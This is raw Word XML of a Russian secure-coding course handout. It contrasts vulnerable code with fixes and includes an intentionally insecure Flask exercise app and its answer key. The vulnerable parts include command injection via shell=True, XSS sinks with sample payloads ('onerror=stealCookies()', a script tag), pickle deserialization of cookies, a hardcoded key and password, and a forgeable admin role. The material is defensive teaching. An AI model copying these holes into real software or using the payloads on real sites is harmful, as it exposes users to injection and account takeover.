    <w:p w14:paraId="384975A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># utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753292C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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035CEB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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47DDA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2F10339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5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Внедрение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команд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(Command Injection - A03:2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9786A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generate_report_unsafe(date_range):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15EFB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КРИТИЧЕСКАЯ УЯЗВИМОСТЬ: Пользовательский ввод попадает в командную оболочку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27991B2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 xml:space="preserve">command = f"/usr/bin/report-generator --period {date_range}"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ОПАСНО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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3E72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output = subprocess.check_output(command, shell=True)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shell=True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>удваивает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риск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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6EB2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output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03671A6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256D550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generate_report_safe(date_range):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E631B4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ИСПРАВЛЕНИЕ: Без shell=True и разделение команды и аргументов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A155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 xml:space="preserve">command = ["/usr/bin/report-generator", "--period", date_range]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date_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>всё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ещё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нужно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валидировать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>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1540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ВАЛИДАЦИЯ: Проверить, что date_range соответствует ожидаемому формату (например, "2024-01").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F1EEB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if not re.match(r'^\d{4}-\d{2}$', date_range):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F5EE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raise ValueError("Invalid date format")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7E8B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output = subprocess.check_output(command, shell=False)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shell=False </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>по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умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6038259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return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65074C5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</w:p>
    <w:p w14:paraId="6408F68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Задание 2: Анализ фронтенд-кода (JavaScript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E59C9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Файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>profile.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (React Component)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B50BA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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C9B0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// Уязвимость 6: XSS через InnerHTML / Небезопасные операции с DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224062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function UserProfile({ userData }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DD3C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const [bio, setBio] = useState('');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8139B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148F76C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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// ОПАСНО: Прямое присваивание HTML из непроверенных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECC4F3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const updateBio = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08B1A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// Допустим, userData.bio приходит с сервера и не экранирован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B94FD8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document.getElementById('user-bio').innerHTML = userData.bio; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// КРИТИЧЕСКАЯ УЯЗВИМОСТЬ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE3EE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// Если userData.bio = '&lt;img src=x onerror=stealCookies()&gt;', произойдёт XSS-атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F829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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115121C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7089001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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// ИСПРАВЛЕНИЕ в React: Использовать данные как текст или санитизированный вывод.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D572C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return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1496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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03890F9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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* БЕЗОПАСНО: React автоматически экранирует содержимое */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C26F4C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&lt;div&gt;{userData.bio}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8984F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE7ED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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* ОПАСНО, если используется dangerouslySetInnerHTML без санитизации */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A152E7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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;div dangerouslySetInnerHTML={{ __html: userData.bio }} /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A53B3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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD839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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270E5D8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26A87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7F1974F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// Уязвимость 7: Утечка чувствительных данных в клиентский код</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9B15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const API_CONFIG = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05A06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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// КРИТИЧЕСКАЯ УЯЗВИМОСТЬ: Секретный ключ НИКОГДА не должен быть в фронтенд-коде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6D5E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secretKey: 'sk_live_1234567890abcdef', </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Утечка ключа Stripe/другого сервиса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7B90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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apiUrl: '/api/v1/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04724CC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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF79B3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4909BC8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// ИСПРАВЛЕНИЕ: Все секретные ключи и критичная бизнес-логика должны быть на бэкенде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15919DE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// Фронтенд должен запрашивать у бэкенда подписанный токен для вызова внешних API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339DEDB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0E642048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Файл: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>auth.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323730D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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58806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// Уязвимость 8: Небезопасная работа с аутентификацией и токенами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00434F1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function handleLogin() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D93A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fetch('/api/login', { method: 'POST', body: JSON.stringify(credentials) })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22570C6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.then(res =&gt; res.json())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0084526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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A9BC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if (data.token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216F10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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Хранение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токена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в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localStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>уязвимо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для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XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529160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localStorage.setItem('authToken', data.token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543EA96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</w:rPr>
        <w:t>// Лучше: httpOnly cookie (устанавливается сервером).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F6320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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB282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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D70AE6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE5E8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0BDE6AF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function makeAuthenticatedRequest(url) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB974F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const token = localStorage.getItem('authToken');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC92AA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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// УЯЗВИМОСТЬ: Отсутствие обработки ошибок сети/таймаута может привести к неочевидным состояниям безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7548E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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return fetch(url, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617B1E7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headers: { 'Authorization': `Bearer ${token}` }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C6C7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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9AB4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DB145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</w:p>
    <w:p w14:paraId="5D66670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Практическое задание для самостоятельного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C466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Проанализируйте приведённый ниже код Flask-приложения. Найдите и опишите минимум </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 уязвимости</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>, классифицируйте их по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> и предложите исправления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75876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Файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D7634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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908D9A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from flask import Flask, request, render_template_string, make_response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53920E4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pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A2E8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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418CDF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06A3129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app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C0C3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app.secret_key = os.urandom(16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E1F2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503F093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База данных "на лету"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5082B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USERS = {'admin': 'password123'}  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># &lt;-- Проблема 0 (очевидная)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B30E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543D600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@app.route('/login', methods=['GET', 'POST'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A1D7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login():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068990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request.method == 'POST':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C24EC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username = request.form['username']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454B72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password = request.form['password']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102457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2F30470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Проверка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пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A213B4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if username in USERS and USERS[username] == password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC9A1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resp = make_response("Login successful!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0492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Создаём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"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>куку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" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>с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данными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пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396282F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user_data = pickle.dumps({'username': username, 'role': 'user'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1346B02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resp.set_cookie('user_data', user_data)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&lt;--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1?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E1402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return resp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168076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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF069A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&lt;form method="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281151A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&lt;input name="username"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77544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&lt;input type="password" name="password"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE9205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&lt;button&gt;Login&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B007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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F063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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF46E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4C0FBF3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@app.route('/profile')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132897A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def profile():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D906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Получаем данные из куки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9402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user_data_cookie = request.cookies.get('user_data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F846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user_data_cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357CBB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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E48C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user_data = pickle.loads(user_data_cookie)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&lt;--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2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABB1D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username = user_data.get('username', 'guest')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D28F5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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2280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username = 'guest'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A56F84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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E895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username = 'guest'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266A8A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5760689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Отображаем профиль (имя приходит из GET-параметра для приветствия)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899D1A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welcome_name = request.args.get('name', 'User')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D019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template = f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E028C0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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C25BF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&lt;h1&gt;Welcome, {welcome_name}!&lt;/h1&gt;  &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Уязвимость</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3? --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E8C1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&lt;p&gt;Your username is: {username}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160154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&lt;a href="/admin"&gt;Admin panel&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D525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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC654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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69CA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render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E390A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0031FB9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@app.route('/admin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C9E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def admin():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A690A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Проверяем, админ ли? (очень надёжно!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4207D20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user_data_cookie = request.cookies.get('user_data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110480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user_data_cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8225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user_data = pickle.loads(user_data_cookie)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Повторная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уязвимость</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553934D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 xml:space="preserve">if user_data.get('role') == 'admin':  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Легко подделать в куках!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE38B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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return "SECRET ADMIN DATA: ..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC3697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"Access denied!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB142D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4E5EC2D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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2465B8E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 xml:space="preserve">app.run(debug=True)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># &lt;-- Потенциальная проблема для продакшена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7346F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</w:p>
    <w:p w14:paraId="7A77464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Ответы и разбор (для самопроверки)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD0011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Найденные уязвимости в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5929C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Уязвимость 1 и 2: Небезопасная десериализация (A08:2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509655AB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Код</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> user_data = pickle.loads(user_data_cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326169A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Описание:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Библиотека pickle небезопасна для десериализации непроверенных данных. Злоумышленник может создать вредоносную сериализованную строку, которая выполнит произвольный код на сервере при десериализации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EC7B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Исправление:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Использовать безопасный формат для хранения данных в куках (например, JSON) и криптографическую подпись (например, с помощью itsdangerous в Flask). user_data = json.loads(decrypted_data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFA897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Уязвимость 3: Межсайтовый скриптинг (XSS) (A03:2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68539A25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Код</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> template = f"&lt;h1&gt;Welcome, {welcome_name}!&lt;/h1&gt;", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>где</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> welcome_name = request.args.get('name', 'User').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D6FDB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Описание:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Пользовательский ввод из GET-параметра name напрямую подставляется в строку шаблона без экранирования. Например, ?name=&lt;script&gt;alert('XSS')&lt;/script&gt; приведёт к выполнению JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C90C6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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Исправление:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Использовать механизм шаблонов Jinja2 с автоэкранированием: return render_template('profile.html', welcome_name=welcome_name). Или</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>явно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>экранировать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: from markupsafe import escape; escape(welcome_name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDE88B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Уязвимость 4: Нарушение контроля доступа (Broken Access Control) (A01:2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFEF283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Код:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Проверка роли admin основывается на данных из неподписанной куки, которую пользователь может легко подделать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA7982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Описание:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Роль пользователя хранится на стороне клиента и не проверяется на сервере. Достаточно изменить role на admin в куке user_data (после её расшифровки/подписи), чтобы получить доступ к /admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71045BF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Исправление:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Хранить идентификатор сессии (случайный токен) в куке, а данные о пользователе (включая роль) — в защищённом серверном хранилище (сессии, БД, Redis). При запросе к /admin проверять роль по идентификатору сессии на сервере.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4940F0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Дополнительные проблемы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D1D2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Хранение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>пароля</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
